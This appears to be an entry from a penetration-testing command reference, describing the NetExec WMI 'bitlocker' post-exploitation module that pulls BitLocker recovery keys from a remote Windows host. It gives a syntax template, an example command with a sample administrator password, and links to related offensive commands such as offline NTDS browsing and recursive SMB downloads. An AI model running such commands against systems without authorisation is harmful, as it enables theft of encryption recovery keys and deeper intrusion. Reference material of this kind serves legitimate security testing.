NetExec WMI bitlocker Module
Pull BitLocker recovery keys from a host over WMI. Faster than the SMB equivalent in environments where DCOM/WMI is the only Windows-management protocol you can reach.
- Tool
- nxc
- Category
- Post-Exploitation / Data Collection
- Platform
- linux
- Requires
- password
- Protocols
- WMI
Syntax
Angle-bracket tokens are placeholders — replace them with your target's values, or open this command in the app to fill them in and copy the result.
nxc wmi <target> -u '<user>' -p '<password>' -M bitlocker
Examples
nxc wmi 10.10.10.10 -u administrator -p 'Password123!' -M bitlocker
Tags
Related commands
- Impacket NTFS-Read (Offline NTDS Browse) Browse a raw NTFS image (e.g. a VSS shadow copy of C:\Windows\NTDS) offline as if it…
- NetExec RDP Screenshot Capture a screenshot of the current RDP login screen / desktop without authenticating…
- NetExec SMB BitLocker Recovery Keys Retrieve BitLocker recovery keys stored in Active Directory
- SMBClient Recursive Download Download folder recursively from SMB share